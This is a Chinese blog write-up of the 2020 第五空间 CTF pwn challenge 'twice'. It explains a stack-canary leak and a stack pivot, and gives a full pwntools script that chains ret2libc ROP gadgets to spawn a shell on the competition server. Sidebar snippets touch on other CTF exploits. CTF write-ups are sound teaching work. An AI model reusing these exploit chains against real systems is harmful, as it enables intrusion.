【第五空间2020】twice WriteUp

最新推荐文章于 2021-12-27 10:44:04 发布
最新推荐文章于 2021-12-27 10:44:04 发布
阅读量284 收藏 1
点赞数
文章标签: CTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/tqydyqt/article/details/107152431
版权

checksec一下,开了栈溢出保护和栈执行保护

IDA打开看看,main函数是一个for循环,InitData函数执行初始化setvbuf操作后返回0

跟进这个函数,结合main函数发现,这个函数只会被调用2次,然后main函数将会结束,第一次进这个函数的时候,v3=89,第二次进这个函数的时候,v3=112


缓冲区s的大小是88字节,而后面紧跟着canary,因此第一次写满89字节以后可以泄露出canary
(canary首位必定为0,所以通过第89个字节覆盖首位可以使得puts函数顺带一并输出后面的canary的值。第一次进这个函数时,输出以后会将最后一个字节置0,而canary首位刚好是0,因此不会被栈溢出保护检查到)
泄露以后可以通过第二次112字节的输入来进行栈溢出,由于只能刚好覆盖rbp和ret address,所以采用栈转移技术,执行我们前面输入的rop链
第一次rop泄露puts的地址,找到对应的libc,计算出system函数和binsh字符串的位置,然后返回main函数,进行第二轮rop,拿到shell

#!/usr/bin/python2
#coding:utf-8

from pwn import *
from LibcSearcher import *
from struct import pack

context.os='linux'
context.arch='amd64'
context.log_level='debug'

sd=lambda x:io.send(x)
sl=lambda x:io.sendline(x)
ru=lambda x:io.recvuntil(x)
rl=lambda :io.recvline()
ra=lambda :io.recv()
rn=lambda x:io.recv(x)
sla=lambda x,y:io.sendlineafter(x,y)

io=remote('121.36.59.116',9999)
#io=process('./pwn')
elf=ELF('./pwn')

main=p64(0x40087b)
leave_ret=p64(0x400879)
pop_rdi_ret=p64(0x400923)

ra()
sd('a'*89)
rn(89)
canary='\0'+io.recv(7)
stack=u64(rn(6)+'\0'*2)
stack=stack-8*14
ra()
sd((p64(0)+pop_rdi_ret+p64(elf.got['puts'])+p64(elf.plt['puts'])+main).ljust(88,'a')+canary+p64(stack)+leave_ret)
rn(1)
puts_addr=u64(rn(6)+'\0'*2)
libc=LibcSearcher('puts',puts_addr)
ra()
sd('a'*89)
rn(89)
canary='\0'+rn(7)
stack=u64(rn(6)+'\0'*2)
stack=stack-8*14
ra()
sd((p64(0)+pop_rdi_ret+p64(puts_addr-libc.dump('puts')+libc.dump('str_bin_sh'))+p64(puts_addr-libc.dump('puts')+libc.dump('system'))+main).ljust(88,'a')+canary+p64(stack)+leave_ret)

io.interactive()
古月浪子
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
第五空间ctf2020pwn-twice
qq_36495104的博客
06-25 636
checsec ida main函数 int __cdecl main(int argc, const char **argv, const char **envp) { for ( nCount = InitData(); (unsigned int)sub_4007A9(nCount); ++nCount ) ; return 0; } sub_4007A9函数 // a1=ncount __int64 __fastcall sub_4007A9(int a1) { unsign
2020第五空间智能安全大赛PWN——twice
baidu_36110484的博客
06-30 810
0x00背景 这次比赛中的一道pwn题,主要考察了栈迁移和泄露canary。之前没有接触过栈迁移,所以当时没有做出来(好多人都做出来了,捂脸)。 没办法,菜鸡只能赛后复盘。注:虚拟机环境使用的动态库为kali的libc-2.30.so 0x01源码分析 主要代码逻辑如下,main函数之后可以进行两次输入,然后将输入的字符串打印出来。第一次输入可以溢出一个字节,用于泄露canary和栈地址(用于之后的栈迁移),第二次输入可以溢出到返回地址,修改程序流程完成栈迁移,从而执行ROP链。 0x02 exp构造 需
2020第五空间 web writeup
a3320315的博客
06-27 3374
hate-php 源码 <?php error_reporting(0); if(!isset($_GET['code'])){ highlight_file(__FILE__); }else{ $code = $_GET['code']; if (preg_match('/(f|l|a|g|\.|p|h|\/|;|\"|\'|\`|\||\[|\]|\_|=)/i',$code)) { die('You are too good for me');
2020第五空间”wp-pwn-twice
weixin_45209963的博客
06-25 763
这次第五空间总算不是第500空间了… 题难度还行。pwn只做了一个twice,不过好歹是正式比赛第一次做出来pwn…放wp吧。 老规矩,先checksec一波 64位,开了canary和nx。上IDA。 main函数主要就是一个循环 sub_4007A9是这样的 a1就是传入的nCount(初值为0) 。结合主函数的循环,可以知道整个循环只能跑两次。 第二次执行完后返回0,就跳出循环了。 整个的函数作用大体上就是向s数组中读v3个字节。 sub_40076D长这样 第一次返回89,第二次返回112。
第五空间部分Writeup
SkYe's Blog
06-26 625
twice 分析 保护情况 Arch: amd64-64-little RELRO: Partial RELRO Stack: Canary found NX: NX enabled PIE: No PIE (0x400000) 漏洞函数 程序一共有两次输入的机会,第一次输入长度为 0x50+9 ;第二次输入长度为:0x50+0x20 。存储字符串的变量 s 距离 rbp 是 0x60 ,也就是第二次输入是栈溢出,溢出长度仅可覆盖 rip 。 输入处理函数: __
2020第五空间.zip
07-20
2020第五空间 比赛逆向 pwn等赛题,除web题外所有赛题均有,含wp,麒麟系统wp。
第五空间writeup-str4nge
wyj_1216 House
08-28 1369
web 空相 进入后: 尝试:id = 1 再次尝试:id = 1 and 1 = 1 尝试读取上面的php文件:25d99be830ad95b02f6f82235c8edcf7.php 发现token 于是: http://111.33.164.4:10001/25d99be830ad95b02f6f82235c8edcf7.php?token=1DJBAAA03PNLD02GJ2S1M...
2020第五空间部分wp
starssgo的博客
06-25 2871
我是废物~,我个人的话出了4个题。分别是pwn类的twice,of,misc类的loop,re类的rev,写下wp,后续的话可能会更新pwn类的pwnme的wp,由于我环境搭建没打好,pwnme本来也是个简单题来着。 等环境整好了复现出来了在更新pwnme吧,现在先把现有的wp贴上去。 twice 程序循环两次,第一次泄露canary+stack地址,第二次执行栈迁移溢出,我这里用的ret2libc,很多方法。 from pwn import * from LibcSearcher import LibcS
第五空间Writeup_Web
Lethe's Blog
09-03 1131
空相 (1)进入页面,提示了参数id (2)尝试一下:?id=1‘ (3)
ctfshow—Node.js漏洞总结
cosmoslin的博客
12-27 3838
1 Js大小写绕过 ctfshow web334 下载源码 var findUser = function(name, password){ return users.find(function(item){ return name!=='CTFSHOW' && item.username === name.toUpperCase() && item.password === password; }); }; 需要以账户ctfshow,密码123456登录
2020 5space pwn题 twice
BengDouLove的博客
07-13 297
好久好久没有写博客了,刚放暑假希望自己能抓紧学学吧 -_- 6月24号比的赛,现在才想起来写总结,最近痴迷于想扣篮,一直在打球也没有很努力在学习。。。 一场比赛只出来这么一道题,不过也行了,最近一直没有学pwn,还能记得是真不错。。。 主函数就是一个循环,nCount是主要参数, InitData函数无关紧要,,点进去 sub4007A9函数看一看 这里的形参 a1 就是 nCount 传进来的,是一开始那个循环的计数器,所以初始值为0 后面就有点看不懂了,所以点进去 sub_400760函数 看
buuctf XCTF October 2019 Twice SQL Injection 二次注入原理+题解
AAAAAAAAAAAA66的博客
12-21 2325
这里要吐槽一点XCTF,之前翻题目时发现有道10分的,还是二次注入,还是0人做出,看了write up觉得还挺简单,就想混着写一下,结果0人做出的原因居然是环境打不开。然后在buuctf 平台找到了这道题,所以就试着写下write up。 目录 二次注入 二次注入的成因 二次注入常出现的地方 题解 思路 步骤 二次注入 二次注入的成因 由于开发者为了防御sql注入,使网站对我们输入的恶意语句中的一些重要的关键字进行了转义,使恶意的sql注入无法执行(比如说将单引号转义...
2020 第五空间大赛--RE题解
菜鸡的博客
07-11 720
2020 第五空间大赛–RE题解 ManageCode net+MFC的逆向,od好像没法调试(刚载入就运行了,哪个师傅会od调试请教教我) dnspy载入,搜索字符串定位主函数 随后可以打断点调试,跟进if里面的check函数可以找到这里 长度以及格式的验证 FormChk返回后定位到这里 这里有一个chk_344函数,但无法跟进去,双击后找到这个函数 我们需要找到这两个号函数的偏移 随后我们选择用ida载入这个程序,选择第二个以普通pe文件解析 然后找到对应的地址之后就可以f5查看函数逻辑了
ant-design-4.6.2.zip
08-25
ant-design,一套企业级 UI 设计语言和 React 组件库 提炼自企业级中后台产品的交互语言和视觉风格 开箱即用的高质量 React 组件
ant-design-4.16.12.zip
最新发布
08-25
ant-design,一套企业级 UI 设计语言和 React 组件库 提炼自企业级中后台产品的交互语言和视觉风格 开箱即用的高质量 React 组件
ant-design-4.0.0-rc.2.zip
08-25
ant-design,一套企业级 UI 设计语言和 React 组件库 提炼自企业级中后台产品的交互语言和视觉风格 开箱即用的高质量 React 组件
ssm344新生报道管理系统+jsp.zip
08-25
本新生报道管理系统有管理员,学生,负责人三个角色,管理员具有最高权限,可以管理负责人,用户,宿舍,缴费等信息,负责人主要操作新生报到关于宿舍和缴费等信息,学生如果要登录系统,必须报到后才可以进行操作。因而具有一定的实用性。本站是一个B/S模式系统,采用JSP技术和SSM框架,MySQL数据库设计开发,充分保证系统的稳定性。系统具有界面清晰、操作简单,功能齐全的特点,使得高校新生入学报到信息管理工作系统化、规范化。 本系统的使用使管理人员从繁重的工作中解脱出来,实现无纸化办公,能够有效的提高高校新生入学报到信息管理效率。
基于微信小程序基于h 移动网赚项目设计与实现.docx
08-25
基于微信小程序基于h 移动网赚项目设计与实现.docx
Windows 10/11 系统优化工具 Optimizer 16.7
08-25
Optimizer 功能特色 全语言支持(提供19种语言) 提高系统和网络性能 禁用不必要的窗口服务 禁用 Windows 遥测、小娜等 禁用 Office 遥测(仅适用于 Office 2016) 禁用 Windows 10 自动更新 一次快速下载有用的应用程序 卸载 UWP 应用 清理系统驱动器和主要浏览器的配置文件数据 修复常见的注册表问题 对 IP 进行 ping 操作并评估您的延迟 在 SHODAN.io 上搜索 IP 快速更改 DNS 服务器(从预制列表) 刷新域名缓存 删除启动时运行的有害程序 编辑 Hosts 文件 查找文件锁定句柄并终止关联的进程 网络速度监控 硬件检测工具 在桌面上添加项目在右键单击菜单上 为运行对话框定义自定义命令 使用配置文件的静默运行支持
column id specified twice
03-16
这个错误提示是指在SQL查询语句中,指定了两次相同的列名。这通常是因为在SELECT语句中,使用了AS关键字给某个列指定了别名,但是在后面的语句中又使用了原始的列名,导致列名重复。解决方法是检查SQL语句中的列名...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值